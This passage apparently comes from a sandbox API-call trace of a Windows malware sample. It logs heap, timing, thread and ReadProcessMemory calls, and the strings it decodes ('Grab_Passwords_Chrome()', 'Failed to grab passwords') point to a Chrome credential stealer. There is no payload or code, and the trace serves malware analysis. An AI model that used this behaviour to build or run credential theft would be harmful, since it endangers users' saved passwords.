Interval=0x87fec0*=-11000000) returned 0x0 [0179.642] GetTickCount () returned 0x207410f [0179.642] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.642] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.642] GetTickCount () returned 0x207410f [0179.642] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0179.642] GetTickCount () returned 0x207410f [0179.642] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0179.642] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.646] GetTickCount () returned 0x20749a5 [0179.646] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.646] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.646] GetTickCount () returned 0x20749a5 [0179.646] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0179.646] GetTickCount () returned 0x20749a5 [0179.646] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0179.646] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.649] GetTickCount () returned 0x207524a [0179.649] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.649] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.649] GetTickCount () returned 0x207524a [0179.649] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0179.649] GetTickCount () returned 0x207524a [0179.649] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0179.649] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.652] GetTickCount () returned 0x2075ae0 [0179.652] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.652] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.652] GetTickCount () returned 0x2075ae0 [0179.652] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0179.652] GetTickCount () returned 0x2075ae0 [0179.652] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0179.652] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.674] GetTickCount () returned 0x2076386 [0179.674] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.674] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.674] GetTickCount () returned 0x2076386 [0179.674] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0179.674] GetTickCount () returned 0x2076386 [0179.674] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0179.675] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.696] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.703] GetTickCount () returned 0x2076c3b [0179.703] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.703] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.703] GetTickCount () returned 0x2076c3b [0179.703] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0179.703] GetTickCount () returned 0x2076c3b [0179.703] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0179.703] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.703] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.735] GetTickCount () returned 0x20774f0 [0179.735] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.735] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.735] GetTickCount () returned 0x20774f0 [0179.735] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0179.735] GetTickCount () returned 0x20774f0 [0179.735] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0179.735] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.752] GetTickCount () returned 0x2077d96 [0179.752] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.754] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.754] GetTickCount () returned 0x2077d96 [0179.754] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0179.754] GetTickCount () returned 0x2077d96 [0179.754] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0179.754] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.788] GetTickCount () returned 0x207864b [0179.788] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.788] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.789] GetTickCount () returned 0x207864b [0179.789] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0179.789] GetTickCount () returned 0x207864b [0179.789] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0179.789] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.803] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.819] GetTickCount () returned 0x2078f01 [0179.819] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.819] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.819] GetTickCount () returned 0x2078f01 [0179.820] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0179.820] GetTickCount () returned 0x2078f01 [0179.820] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0179.820] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.850] GetTickCount () returned 0x20797b6 [0179.851] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.851] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.851] GetTickCount () returned 0x20797c5 [0179.851] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0179.851] GetTickCount () returned 0x20797c5 [0179.851] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0179.851] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.873] GetTickCount () returned 0x207a06b [0179.873] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.874] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.874] GetTickCount () returned 0x207a06b [0179.874] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0179.874] GetTickCount () returned 0x207a06b [0179.874] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0179.874] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.903] GetTickCount () returned 0x207a920 [0179.903] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.903] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.903] GetTickCount () returned 0x207a920 [0179.903] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0179.903] GetTickCount () returned 0x207a920 [0179.904] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0179.904] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.934] GetTickCount () returned 0x207b1d6 [0179.934] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.935] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.935] GetTickCount () returned 0x207b1d6 [0179.935] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0179.935] GetTickCount () returned 0x207b1d6 [0179.935] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0179.935] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.001] GetTickCount () returned 0x207ba9a [0180.001] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0180.001] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0180.001] GetTickCount () returned 0x207ba9a [0180.001] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0180.002] GetTickCount () returned 0x207ba9a [0180.002] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0180.002] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0180.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.068] GetTickCount () returned 0x207c37f [0180.068] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0180.068] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0180.068] GetTickCount () returned 0x207c37f [0180.068] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0180.068] GetTickCount () returned 0x207c37f [0180.068] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6e160 | out: hHeap=0x2150000) returned 1 [0180.068] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0180.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.117] GetTickCount () returned 0x207cc53 [0180.117] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0180.117] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.117] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e5c8d0 [0180.117] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e5c960 [0180.117] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32a44010 [0180.117] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.117] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f230, lpBuffer=0x32e5c960, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e5c960*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e5c960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.117] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49de0 [0180.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e5c960, cbMultiByte=-1, lpWideCharStr=0x32e49de0, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5 [0180.118] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x6139e0, lpBuffer=0x32a44010, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32a44010*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44010, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0180.118] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x60) returned 0x32e5c9f0 [0180.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44010, cbMultiByte=-1, lpWideCharStr=0x32e5c9f0, cchWideChar=45 | out: lpWideCharStr="Grab_Passwords_Chrome(): Can't open database") returned 45 [0180.118] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f220, lpBuffer=0x32e5c8d0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e5c8d0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e5c8d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.118] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49ea0 [0180.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e5c8d0, cbMultiByte=-1, lpWideCharStr=0x32e49ea0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.118] SetEvent (hEvent=0x1b4) returned 1 [0180.129] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c960 | out: hHeap=0x2150000) returned 1 [0180.129] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44010 | out: hHeap=0x2150000) returned 1 [0180.129] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5c8d0 | out: hHeap=0x2150000) returned 1 [0180.129] GetTickCount () returned 0x207cc53 [0180.130] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0180.130] GetTickCount () returned 0x207cc53 [0180.130] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49ee0 [0180.130] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e41a50, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x520) returned 0x5e4 [0180.130] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49ee0 | out: hHeap=0x2150000) returned 1 [0180.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.133] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.134] GetTickCount () returned 0x207d4f9 [0180.134] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x327476e0 [0180.134] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.135] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e4ff10 [0180.135] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e4ffa0 [0180.135] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32a44010 [0180.135] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.135] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f0e0, lpBuffer=0x32e4ffa0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e4ffa0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e4ffa0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.135] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49f00 [0180.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e4ffa0, cbMultiByte=-1, lpWideCharStr=0x32e49f00, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5 [0180.135] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x615d20, lpBuffer=0x32a44010, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32a44010*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44010, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0180.135] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e50030 [0180.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44010, cbMultiByte=-1, lpWideCharStr=0x32e50030, cchWideChar=29 | out: lpWideCharStr="unable to open database file") returned 29 [0180.135] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f230, lpBuffer=0x32e4ff10, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e4ff10*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e4ff10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.135] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49f80 [0180.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e4ff10, cbMultiByte=-1, lpWideCharStr=0x32e49f80, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.136] SetEvent (hEvent=0x1b4) returned 1 [0180.151] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4ffa0 | out: hHeap=0x2150000) returned 1 [0180.151] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44010 | out: hHeap=0x2150000) returned 1 [0180.151] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4ff10 | out: hHeap=0x2150000) returned 1 [0180.151] GetTickCount () returned 0x207d508 [0180.151] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f960 [0180.151] GetTickCount () returned 0x207d508 [0180.151] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49f20 [0180.151] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x327476e0, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0xec) returned 0x61c [0180.152] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49f20 | out: hHeap=0x2150000) returned 1 [0180.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.164] GetTickCount () returned 0x207ddae [0180.164] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e50190 [0180.164] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.164] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e501d0 [0180.164] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41410 [0180.164] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32a44010 [0180.164] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.164] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f230, lpBuffer=0x32e41410, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e41410*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41410, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.165] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234ba10 [0180.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41410, cbMultiByte=-1, lpWideCharStr=0x3234ba10, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.165] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x615ce0, lpBuffer=0x32a44010, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32a44010*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44010, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0180.165] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e414a0 [0180.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44010, cbMultiByte=-1, lpWideCharStr=0x32e414a0, cchWideChar=27 | out: lpWideCharStr="Failed to grab passwords: ") returned 27 [0180.165] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f220, lpBuffer=0x32e501d0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e501d0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e501d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.165] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bef0 [0180.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e501d0, cbMultiByte=-1, lpWideCharStr=0x3234bef0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.165] SetEvent (hEvent=0x1b4) returned 1 [0180.178] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41410 | out: hHeap=0x2150000) returned 1 [0180.178] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44010 | out: hHeap=0x2150000) returned 1 [0180.178] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e501d0 | out: hHeap=0x2150000) returned 1 [0180.178] GetTickCount () returned 0x207ddae [0180.178] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f5a0 [0180.178] GetTickCount () returned 0x207ddae [0180.178] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b9b0 [0180.178] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e50190, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0xe5c) returned 0x630 [0180.178] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b9b0 | out: hHeap=0x2150000) returned 1 [0180.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.186] GetTickCount () returned 0x207e654 [0180.186] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e501d0 [0180.186] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.186] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41410 [0180.186] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32a441c0 [0180.186] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32a44250 [0180.186] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.186] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f290, lpBuffer=0x32a441c0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32a441c0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a441c0, cbMultiByte=-1, 